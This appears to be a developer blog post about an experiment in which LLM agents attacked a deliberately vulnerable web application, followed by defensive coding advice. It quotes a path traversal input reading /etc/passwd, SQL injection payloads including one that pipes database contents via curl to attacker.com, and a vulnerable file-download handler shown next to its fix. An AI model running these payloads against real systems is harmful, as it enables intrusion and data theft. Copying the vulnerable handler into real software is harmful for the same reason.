AI vs. AppSec: What I Learned Analysing a $1,500 LLM Hacking Experiment

We’ve all seen the breathless marketing pitches: "AI is going to completely automate penetration testing!" or "Our LLM agent can find and patch every vulnerability in your codebase!" As developers, it’s easy to get cynical about these claims. We know how nuanced software security is. A bug isn't just a pattern in code; it’s often a logical flaw in how business rules interact.

But instead of just hand-waving the AI hype away, someone actually put it to a rigorous, expensive test. Recently, security researcher and developer Technical Security Specialist Johann Rehberger built a deliberately vulnerable web application and spent over $1,500 in LLM API fees (primarily using OpenAI's GPT-4o) to see if autonomous AI agents could actually hack it.

The results of this experiment are a goldmine for developers. They cut through the marketing fluff and show us exactly what LLM-based attackers are capable of today, where they miserably fail, and—most importantly—how we need to adapt our defensive coding practices to survive the era of automated AI exploits. Let’s dive into the architecture of this experiment, look at some simulated exploit patterns, and unpack what this means for the future of application security.

The Setup: The Vulnerable Playground

To understand the LLM's performance, we first need to look at what it was up against. The target wasn't a simple, synthetic "Capture the Flag" (CTF) challenge with obvious flags hidden in text files. Instead, it was designed to mimic a modern, multi-tier enterprise application. The architecture looked something like this:


[ User / LLM Agent ] 
       │
       ▼ (React Frontend / API Calls)
[ FastAPI Gateway Service ] 
       │
       ├──► [ Microservice A: User Management ] ──► [ PostgreSQL ]
       │
       └──► [ Microservice B: Document Store ]  ──► [ Vector DB ]
                                                └──► [ AWS S3 Bucket ]

This application featured realistic business logic, including:

An authentication and authorization layer (JWT tokens, role-based access control).
An LLM-powered helper feature (introducing potential indirect prompt injection vectors).
A document upload and parsing system (vulnerable to path traversal and SSRF).
Standard database interactions (vulnerable to SQL injection under specific, non-obvious conditions).

To make the experiment realistic, the AI agent wasn't just given the source code. It was given an execution environment. The agent had access to a bash terminal, Python scripting capabilities, and HTTP clients, allowing it to interact with the target application dynamically, analyze responses, rewrite its payloads, and try again. This is what we call an "LLM Agent Loop."

Inside the Agent Loop: How the AI Attempts to Hack

How does an LLM actually go about attacking an application? It doesn't just run nmap and call it a day. It operates on a ReAct (Reasoning and Acting) framework. Here is a simplified representation of the agent's internal loop when encountering an API endpoint:


1. Thought: "The /api/v1/documents endpoint accepts a file_path parameter. This might be vulnerable to Directory Traversal."
2. Action: Use curl tool to send payload: ../../../etc/passwd
3. Observation: Server responds with "500 Internal Server Error - Path not allowed."
4. Thought: "The server is validating path separators. Let me try URL encoding the slashes (%2e%2e%2f) or using null bytes."
5. Action: Use curl tool with encoded payload.

This loop of Thought -> Action -> Observation -> Thought is incredibly powerful. Because the LLM has a massive context window and deep knowledge of security concepts, it can pivot its strategy based on the specific error messages your application returns.

Where the LLM Excelled: Low-Hanging Fruit and Scripting

The experiment revealed that LLMs are terrifyingly efficient at certain types of security tasks:

1. Rapid Reconnaissance and API Mapping

If your API has exposed Swagger/OpenAPI documentation or leaky error messages, the LLM will map your entire attack surface in seconds. It doesn't get tired, and it doesn't miss endpoints. It can read through hundreds of pages of API documentation instantly and identify mismatching parameters.

2. Exploiting Standard Injection Flaws

Consider a classic SQL injection vulnerability where input isn't properly parameterized. A human might take a few minutes to craft the perfect payload to bypass a web application firewall (WAF). An LLM can generate and test dozens of variations in seconds. For example, if a standard payload fails:

-- Standard payload
' UNION SELECT username, password FROM users --

The LLM can quickly pivot to database-specific obfuscation if it detects the backend is PostgreSQL:

-- Obfuscated PostgreSQL payload generated by agent
'; COPY (SELECT database_to_xml(true,true,'')) TO PROGRAM 'curl http://attacker.com/exfil' --

3. Writing Custom Exploit Scripts on the Fly

If the agent discovered a multi-step vulnerability (e.g., register a user -> get a token -> use token to exploit an IDOR on a document endpoint -> exfiltrate data), it didn't do it manually. It wrote custom Python scripts using requests, executed them locally, read the output, and parsed the stolen data. This level of ad-hoc tool creation is something traditional vulnerability scanners simply cannot do.

Where the LLM Failed: The Cognitive Wall

Despite spending $1,500 and running thousands of iterations, the LLM agents hit a hard ceiling. They struggled significantly with three main areas:

1. Complex State and Multi-Step Business Logic

While the agent could easily script a two-step API exploit, it struggled with complex, stateful business logic. If an exploit required initiating a transaction, waiting for an asynchronous webhook, modifying a specific session state, and then triggering a race condition, the LLM's "context drift" became an issue. It would lose track of the ultimate goal, get stuck in repetitive loops, or hallucinate APIs that didn't exist.

2. Context Window Exhaustion and "State Loops"

This is where the $1,500 price tag comes from. As the hacking session progressed, the agent’s prompt history grew massive. It contained terminal outputs, API responses, and past failed attempts. Once the context window got cluttered, the LLM began to make silly mistakes. It would repeatedly try the exact same exploit payload that had failed ten steps earlier, burning through API credits without making progress.

3. Novel Vulnerability Discovery

LLMs are pattern matchers. They are incredible at finding variants of known vulnerabilities (SQLi, XSS, SSRF, path traversal). However, they cannot "think" outside of their training data. If your application has a highly unique logical vulnerability born from proprietary business rules, the LLM is unlikely to discover it unless it directly mirrors a public CVE.

What This Means for Developers: Elevating Our Defensive Game

Some developers might look at the failures of these AI agents and think, "Great, our jobs are safe, and we don't need to worry about AI hackers yet."

That is the wrong takeaway.

What this experiment proves is that the cost of executing highly targeted, automated, and adaptive attacks has plummeted to near zero. While a human pentester might charge thousands of dollars for a few days of work, an attacker can run dozens of these LLM agent loops overnight for a fraction of the cost. Even if the AI only succeeds 10% of the time on complex apps, that is a massive risk.

Here is how we, as developers, must adapt our defensive strategies:

1. Stop Relying on "Security through Obscurity"

If your security model relies on attackers not finding an unlinked API endpoint or not understanding your JSON payload structure, you are cooked. LLMs are too good at guessing, brute-forcing, and mapping interfaces. Every single endpoint must be secured under the assumption that its schema, parameters, and authentication requirements are completely public.

2. Tighten Your Input Validation and Parameterization

Because LLMs can generate infinite variations of injection payloads to bypass simple regex filters, you must use robust, structural defenses.

Use parameterized queries (ORMs or prepared statements) exclusively.
Use strict allow-list validation for file paths and system commands.
Never construct system paths using raw string concatenation.

For example, if you are handling file downloads, do not do this:

# VULNERABLE: Easy prey for an LLM agent
@app.get("/download")
def download_file(filename: str):
    return FileResponse(path=f"/var/www/uploads/{filename}")

Instead, use path resolution and validation to ensure the requested file cannot escape the intended directory:

# SECURE: Safe from path traversal attacks
from pathlib import Path
from fastapi import HTTPException, status

UPLOAD_DIR = Path("/var/www/uploads").resolve()

@app.get("/download")
def download_file(filename: str):
    # Resolve the absolute path
    target_path = (UPLOAD_DIR / filename).resolve()
    
    # Prevent Directory Traversal (ensure the target is inside the upload directory)
    if not target_path.is_relative_to(UPLOAD_DIR):
        raise HTTPException(
            status_code=status.HTTP_403_FORBIDDEN, 
            detail="Access denied"
        )
        
    if not target_path.is_file():
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND, 
            detail="File not found"
        )
        
    return FileResponse(path=target_path)

3. Rate-Limit and Monitor Your APIs

The LLM agent in this experiment made thousands of rapid-fire requests, tweaking payloads by a few characters each time. If your production environment does not have rate-limiting, anomaly detection, and IP blocking, an AI agent can brute-force its way through subtle logical vulnerabilities without you realizing it. Implement robust rate-limiting at your API gateway level to shut down these high-frequency, automated probing behaviors.

Conclusion: The New Era of AppSec

Johann Rehberger's $1,500 experiment is a fascinating glimpse into the future of security. LLMs aren't magic; they get confused by complex state, they run into context limits, and they can be expensive to run continuously. But they are also highly capable, tireless, and capable of writing custom code on the fly to exploit vulnerabilities we leave behind.

As developers, our code is now being audited by machines that don't sleep. The best defense is to write clean, parameterized, and well-validated code, and to treat security not as an afterthought, but as a core architectural requirement.

What are your thoughts? Have you started using LLM tools to audit your own codebases? Have you seen AI agents find bugs that your traditional SAST tools missed? Let’s talk about it in the comments below!

Until next time, happy coding! — Alex